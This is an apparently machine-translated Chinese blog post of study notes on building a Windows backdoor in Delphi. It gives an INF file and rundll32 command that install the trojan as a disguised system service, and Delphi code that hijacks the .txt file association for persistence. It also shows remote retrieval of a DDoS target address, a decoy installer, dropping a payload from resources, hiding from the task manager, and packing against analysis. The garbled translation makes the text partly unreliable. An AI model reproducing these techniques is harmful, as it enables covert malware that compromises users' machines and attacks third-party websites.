Author: Delphiscn (cnBlaster # sohu.com)
http://blog.9cbs.net/delphiscn
Note: This is just a temporary study notes.
Directory 1, preface 2, system loading 3, file association 4, attack control 5, file hidden 6, demonstration
Foreword The current system latter door software is countless, but there is a common problem, which is very easy to be smart in the system loading. And I encountered the online firewall similar to "Tianwang" or "Jinshan Net Dart" basically did not play. A article named "Do All In Cmd Shell" has been visually cleverned on the Internet, and the system based on the NT-based 2000 / XP is basically available. Here I use delphi, and imitate some of the classic back door software to write a backdoor, I hope to exchange programming experience with the masters, it is also a knowledge that I have learned before :)
The system is loaded here, and it is estimated that many friends will immediately think of LOAD in HKLM / SoftWare / Microsoft / Windows / CurrentVersion / Run and Win.ini. That's right, but starting from a combat angle, now use this start-up method a bit behind. And if your program implements a lot, but if there is a problem in startup, isn't it a very depressed thing? Here, according to the "Do All In Cmd Shell" author's idea, we can write an INF file to configure a system service program with this file. In this way, our latter can start with the system service without knowing it. (However, this program has a limitations: only for NT / 2000 / XP) here quotes the author's original text:
Now, let us add a system service inf [Version] Signature = "$ WINDOWS NT $" [DefaultInstall.Services] AddService = inetsvr ,, My_AddService_Name [My_AddService_Name] DisplayName = Windows Internet ServiceDescription = support for Internet Information Services Management . ServiceType = 0x10StartType = 2ErrorControl = 0ServiceBinary =% 11% / save inetsvr.exe as inetsvr.inf, then rundll32.exe setupapi, InstallHinfSection DefaultInstall 128% systemroot% / system32 / inetsvr.inf (here I made a point to modify the original text) [Note:% systemroot% is an environment variable, assuming your system folder is C: / Windows, then% systemroot% of the path is C: / Windows (general 98 or XP) assume your system folder C: / Winnt, then% of the path is C: / Winnt] This example adds a service named INETSVR (if it is very like a service comes with the system, huh, huh). Some explanations: 1. The last four are the service type: 0x10 is a stand-alone process service, 0x20 is a shared process service (such as SVCHOST); launch type: 0 When the system boots, load, 2 by SCM (service Control Manager) Automatically start, 3 manual start, 4 disabled. (Note, 0 and 1 can only be used for drivers) Error control: 0 ignore, 1 Continue and warned, 2 Switch to LastknownGood setting, 3 blue screen. Server location:% 11% indicate the System32 directory,% 10% represents the system directory (WinNT or Windows),% 12% is the drive directory System32 / Drivers. See DDK at other values. You can also use the full path directly without variables. These four items must be there. 2. Six projects in the examples, as well as LoadOrderGroup, Dependencies, etc. Not often used, so don't introduce it. 3, there are two commas behind the inetsvr because there is an uncommon parameter Flags in the middle. Delete a service: [Version] signature = "$ Windows NT $" [defaultinstall.services] DELSERVICE = INETSVR is simple, isn't it?
The following steps are to call this INF installation service in Delphi. ShellExecute we can use this function, the specific use for the shellExecute (handle, nil, pchar ( 'rundll32.exe setupapi, InstallHinfSection DefaultInstall 128% systemroot% / system32 / inetsvr.inf'), nil, nil, sw_shownormal); I think here SW_SHOWNORMAL is a bit not very good because under this parameter. The window of the cmd shell is visible, I don't know if you have any good ways? However, I think the shellexecute function has a benefit ----- If the application can't find INF, there will be no reflection on the computer screen. Simply put, it will not report :) Of course, if you don't feel relieved, you can use the getWindowsDirectory function to absolutely position the Inf file, but I think it is like this. Doubty: Here our shared type servicePE = 0x10 belongs to the standalone process service. It is estimated that this virus will be intercepted by the firewall when accessing the Internet. But like Svchost, the shared process service such as LSASS is not, if we turn the value of the serviceetype to 0x20, I think the situation will change, but I have no in-depth research. Files Association Follow the conventions, we can modify the TXT text association, point the key value in the registry to our backdoor programs. The following code can do this:) Var Backdoor: Tregistry; FileExt: String; FileType: String; FileDescription: String; ExecName: String; WINDIR: STRING; Begin FileExt: = '. Txt'; fileEType: = 'text Document '; FileDescription: =' Text Document ';
SETLENGTH (WINDIR, 128); // Get a Windows Contents GetWindowsDirectory (Pchar (WINDIR), 128); SETLENGTH (WINDIR)); EXECNAME: = WINDIR '/ SYSTEM32 / INETSVR.EXE'; // InetSvr.exe here is our virus program
Backdoor: = tregistry.create; // Create a registry object try on backdoor.rootkey: = hkey_classes_root; // Register the table Root key if not backdoor.openkey (fileext, true) thr; // Create a file type in the registry Exit when failing, is usually the registry error backdoor.writestring ('', filety); // write file type data backdoor.closekey;
IF not backdoor.openkey (fileType, true) THEN / / Open file type FileType keyword; backdoor.writestring (', filedescription); // write file description data if not backdoor.openkey (' shell / open / command ' , True // Open the sub-key EXIT; backdoor.writestring (', execname); backdoor.closekey; // Turn the keyword factory backdoor.free; // Release the registry object END; END; this, as long as the user doubles TXT file, our InetSvr.exe will start again. A few days before the attack control saw an example of the use of the BAT batch file to control the virus program to attack others website. Since I have not fully figured it with the instance of him, but we can use other ways to replace BAT. Let's implement this process: First, you can apply for a homepage space (assuming http://www.attack.com/delphiscn). Upload an ipaddress.txt document. The content is 192.168.0.1 Here, 192.168.0.1 is the address of the website we have to attack. Add the following statement in delphi: var ipaddress: integer; nmhttp.get ('http://www.attack.com/delphiscn/ipaddress.txt'); ipaddress: = strt (nmhttp.body); nmhttp.free; Our procedures get the address ipaddress to attack, and this ipaddress can be controlled by our own :) Next is the attack, we can join a code in the program. Send a packet to 192.168.0.1. The remote server refuses to respond, which is often mentioned in DDOS. Of course, you can also use a method similar to ping, because it is relatively simple, it is no longer detailed here.
Files If your design is more powerful, maybe more than one executable, and we can't do the installer as other shared software. The easiest way to use the COPY / B setup.exe run.exe set.exe command to load the program that you need to run in the previous executable, there are two duties of the setup.exe file, one It is displaying the imagination to let others don't know that this is a Trojan installer, and the second is the real purpose to intercept the Trojan service program from the specified word long position and run the installation. Since the Trojan service part uses "invisible" technology, it will not Not perceived, the code part is positioning copy, which is not described here. Another way is to pre-put the Trojan in the resource file RES, and stored in the current executable in the current executable, it can be released at the appropriate timing. The following code can be used to release the specified file from RES: Procedure Runvirus (from: pchar; fileto: string); var tempdir: string; buf: Pointer; Size: longint; h, reshandle: cardinal; zip: file; beginh : = GetModuleHandle (Pchar (ExtractFileName)))); Tempdir: = '; reshandle: = FindResource (H, makeintResource (1),' DAT '); buf: = Pointer (LoadResource (h, reshandle) Size: = SizeOfResource (H, Reshandle); AssignFile (ZIP, Tempdir Fileto); REWRITE (ZIP, 1); Try Blockwrite (ZIP, BUF ^, Size) Finally Closefile (ZIP); End; End; Resource File Test.rc is made as follows: * Content: 1 DAT "test.exe" * Production: BRCC32 TEST.RC * Add: {$ r * .dfm} // Add Test.res, if you don't add this, When the Trojan is released, it will not be reported to report the error. Be sure to pay attention to this question :) {$ R Test.res} * function call: if not fileexists ('test.exe') THEN Runvirus ('DAT', 'Test. EXE '); additionally, there are several commonly used tips: invisible in the task manager: We can use the clearance title: Program Project1; Uses forms, unit1 in' unit1.pas' {form1}; {$ R * .res} begin // Set the title of the title for the title. Application.title: = '; Application.Initialize; Application.createform (TFORM1, FORM1); Application.Run; End. Toolbar Type: By using setWindowlong Function: setwindowlong (a PPLICATION, HANDLE, GWL_EXSTYLE, WS_EX_TOOLWINDOW); Prevent Procedure Multiple Repeated Run: While making services, while serving, it is often necessary to repeated execution of the program because the same copy will use the same IP address and the same port. It is inevitable to have conflicts.
So, in order to prevent the program from being executed twice. We can add the following code in the program launch event: Suppose our program title is NeverlandProgram Neverland; Usesforms, Windows, Sysutils, Neverland in 'Neverland.Pas' {Form1}; {$ R * .RES} var HMutex: hwnd; : Integer; Begin Application.Initialize; Application.Title: = 'Neverland'; hMutex: = CreateMutex (nil, False, 'Neverland'); Ret: = GetLastError; IF Ret <> ERROR_ALREADY_EXISTS ThenBegin Application.CreateForm (TForm1, Form1) Application.run; endelse releasemutex (hmutex); end. The desessment of the above-mentioned improvement, a system latte program has been settled. Of course, if you are interested, you can also expand it. Finally, don't forget to use acpack to order it, this will increase the difficulties of others. If you have any good ideas or methods, please feel free to discuss with everyone :)
Reference "Do All in cmd shell" http://www.hackeronline.cn/showart.asp?art_id=476&cat_id=7
